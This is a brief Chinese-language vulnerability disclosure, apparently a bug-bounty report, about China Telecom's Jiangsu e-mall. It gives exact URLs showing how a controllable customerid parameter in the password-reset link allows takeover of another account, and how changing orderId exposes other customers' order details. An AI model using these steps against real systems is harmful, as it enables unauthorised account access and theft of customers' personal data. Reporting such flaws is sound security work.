http://js.189.cn/emall/ 中国电信翼猫商城
重置密码的链接为
http://js.189.cn/emall/emall/member/setNewPassWord.html?customerid=()
customerid参数可控,如找回账户“123456”
点发送邮件后直接构造链接
“http://js.189.cn/emall/emall/member/setNewPassWord.html?customerid=4028f4cb46019dab0146133b86d90029”
123456:123456 登录
订单信息遍历
“http://js.189.cn/emall/userManage/getOrderInfo.do?0.2802860678639263&orderId=40519030262”
看一下我修改的帐号只有一个订单,但通过修改orderId可获取他人订单详情
orderId为订单号,只要订单存在便可获取成功
